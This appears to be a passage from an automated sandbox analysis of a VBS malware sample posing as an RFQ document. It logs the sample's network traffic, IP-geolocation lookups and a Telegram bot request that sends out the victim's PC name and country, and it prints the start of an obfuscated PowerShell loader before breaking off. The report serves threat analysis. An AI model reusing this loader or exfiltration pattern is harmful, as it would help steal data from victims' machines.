                                                                2024-10-10 07:28:27 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                2024-10-10 07:28:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                5192.168.2.749980188.114.97.34434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:28 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                2024-10-10 07:28:28 UTC702INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:28 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 1
                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EhJx%2B5cM6WcPLkJo7TOQNZIJmKRI6I589mH9iSxj%2BtkLpj9UcuwtSdvZpCSfqGuyrOtOILJTWCeMHajrmMsPdTNCVzELfUqPfV96q%2Ba0gcJsbwJiDyOIptySa5iJ4FGjjllm1Np6"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d04e4d0bc1c42d3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-10 07:28:28 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                2024-10-10 07:28:28 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                6192.168.2.749982188.114.97.34434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:30 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                2024-10-10 07:28:30 UTC706INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:30 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 3
                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xk7nLvh4uI2GCAyrKDe2bKXmyEHC31w%2FAgpsjsCJrKm7Ge69jlncF9t100%2F48Jze%2BjPXOy8uSyT%2Bn%2FV3OpRsDg5g0RqxQFJReHzv5Capp8sBJeBrE5qLyYuDPWukkAXpk8D4Z232"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d04e4e0ee9a4205-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-10 07:28:30 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                2024-10-10 07:28:30 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                7192.168.2.749984188.114.97.34434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:32 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-10 07:28:32 UTC710INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:32 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 5
                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zQGfNQ1DNhFeVybtHBfbdBN0Mp48mnwTQUcaf%2FVCvv%2FhBGCFRMvWepT0MuBwW%2FnUZDjcCXcSaQ2eSUqsA1MKWvuLCKxYxPYipp%2BFOKZbaH4oY%2B6nQ9Kv3h4z%2FPHbAwuaPwH%2FPpHW"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d04e4ebbd994223-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-10 07:28:32 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                2024-10-10 07:28:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                8192.168.2.749986188.114.97.34434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:34 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                2024-10-10 07:28:35 UTC704INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:35 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 8
                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=woZAqF9bmNyWWo2M31N6vBgt6lAEemXBjsMGCQ6%2BynInI7%2FfbNZuAadPYcjT42qJ69UAYzX7KvSNFQ%2Bdy709nojBVu6Re9RQBeoGYPSqiIOMx9gg82wgKQEco1%2FA8quMpNANB4wv"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d04e4fabb8d80d3-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-10 07:28:35 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                2024-10-10 07:28:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                9192.168.2.749988188.114.97.34434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:36 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-10 07:28:36 UTC702INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:36 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 9
                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=B8a3gaZwElXpydJjt3Y%2FRtDFhVghM2hzemXqkzcPCi4UNCMATWKXWMz1K7L%2B51dAp2A22NgWVoL92Xz5a5WJBofDZ9%2BBKOxA7NXrF7tugZavWYIbF01z1GRLgreey83WukDNVPBK"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d04e505dfb8447a-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-10 07:28:36 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                2024-10-10 07:28:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                10192.168.2.749990188.114.97.34434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:38 UTC60OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                2024-10-10 07:28:38 UTC705INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:38 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 11
                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ql91X4IymbQg7cr3gZNBoiSRZfhwMrvzsDEbBLxkkgVe95c5HFqsKCrkAG%2FkaCWPmj6D%2BU9Rb%2FE4XhHpr4B4n2VUXTcCuWlPFmgZ%2FVTVlP82jBnzBMFkqeToUF6kDRohbwv5XZzN"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d04e50ed9480f74-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-10 07:28:38 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                2024-10-10 07:28:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                11192.168.2.749992188.114.97.34434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:39 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-10 07:28:39 UTC701INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:39 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 12
                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=PggyNXoiEWNyYQ55zUBBbIxI7lee%2B7PMBsS9TX6PlbtCAf8xIp2r915ZaYxlJ%2BTkPF4PZuVDFEEd4lsbHYKNmwR1docCzqgwqSL1nqitmArrtIdQAFHaksw53lTEqWWJRbNLTivE"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d04e517de920f70-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-10 07:28:39 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                2024-10-10 07:28:39 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                12192.168.2.749994188.114.97.34434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:41 UTC84OUTGET /xml/8.46.123.33 HTTP/1.1
                                                                Host: reallyfreegeoip.org
                                                                Connection: Keep-Alive
                                                                2024-10-10 07:28:42 UTC705INHTTP/1.1 200 OK
                                                                Date: Thu, 10 Oct 2024 07:28:41 GMT
                                                                Content-Type: application/xml
                                                                Transfer-Encoding: chunked
                                                                Connection: close
                                                                access-control-allow-origin: *
                                                                vary: Accept-Encoding
                                                                Cache-Control: max-age=86400
                                                                CF-Cache-Status: HIT
                                                                Age: 14
                                                                Last-Modified: Thu, 10 Oct 2024 07:28:27 GMT
                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4YA1hdaHS%2F70GJkVEXo8RAlk1YZKdUzHcVgGSjkjrzhkRuey6vQr6scfCaGCzu5AmGg4X%2BcrR7ASEMx0xAX6%2BirbA9N6mSs1R%2FbHFRWO94zkgccRVu4WPfKQeyehNzZAALPlSDfn"}],"group":"cf-nel","max_age":604800}
                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                Server: cloudflare
                                                                CF-RAY: 8d04e5263a3dde99-EWR
                                                                alt-svc: h3=":443"; ma=86400
                                                                2024-10-10 07:28:42 UTC340INData Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35
                                                                Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
                                                                2024-10-10 07:28:42 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                Data Ascii: 0


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                13192.168.2.749995149.154.167.2204434504C:\Windows\SysWOW64\msiexec.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-10-10 07:28:42 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2010/10/2024%20/%2022:08:16%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                Host: api.telegram.org
                                                                Connection: Keep-Alive
                                                                2024-10-10 07:28:42 UTC344INHTTP/1.1 404 Not Found
                                                                Server: nginx/1.18.0
                                                                Date: Thu, 10 Oct 2024 07:28:42 GMT
                                                                Content-Type: application/json
                                                                Content-Length: 55
                                                                Connection: close
                                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                Access-Control-Allow-Origin: *
                                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                2024-10-10 07:28:42 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                Click to jump to process

                                                                Click to jump to process

                                                                Click to dive into process behavior distribution

                                                                Click to jump to process

                                                                Target ID:0
                                                                Start time:03:27:26
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\wscript.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\#U8a62#U50f9 (RFQ) -RFQ20241010.vbs"
                                                                Imagebase:0x7ff6a2310000
                                                                File size:170'496 bytes
                                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                Target ID:3
                                                                Start time:03:27:32
                                                                Start date:10/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Fllesboet Ramshorns Rhinaria Overdresses Facetterende #>;$Overophedendes='strudsfjerenes';<#Nonneordenen Overspndtes brisantgranaters Galactosuria Badestrande Tagdkningen #>;$Prambelet19=$Forngternes+$host.UI;If ($Prambelet19) {$Svinebstets++;}function Hjlpeprster($Forecastors){$Dihydroxy95=$Barberfish+$Forecastors.'Length'-$Svinebstets; for( $Vandplantes24=5;$Vandplantes24 -lt $Dihydroxy95;$Vandplantes24+=6){$Tillamook='Odorlessness';$Chairway+=$Forecastors[$Vandplantes24];$Dispatch48='Knivblade';}$Chairway;}function Snoose($Spektrenes){ & ($Tvillingsstrene) ($Spektrenes);}$Weakly=Hjlpeprster 'T umbMTownloferiezKrubiiInterlUnwellFrihaaergat/Cornu5Dimho.Fenyl0Drivt Bedri( O teWUnderi urinFe ied SubdoE,siswCont sUrb n Hi.hfN LuxuTvest, Bomba1Flles0C,clo.Bef e0V vob;Kvste TestWRadagiToernnStvfn6 albi4 otr; N,ds TinktxSousa6Bylde4Reip ;Vre,s AutovrM riovPendu:.resa1Phono2Dairy1 List. Duru0Di pl)Stat Tra,eGMicroePlac cPopulkOversoa.kom/Evasi2Octan0 Anti1 Ital0Retst0Vel.e1T.ger0Am ro1Intr totaF prioiJa,thrLoinse D,rifFormaoThe,oxBru,a/ ,ars1La it2 Uva,1Etage. nsuf0Noni ';$Erythrocytes=Hjlpeprster ' hyp 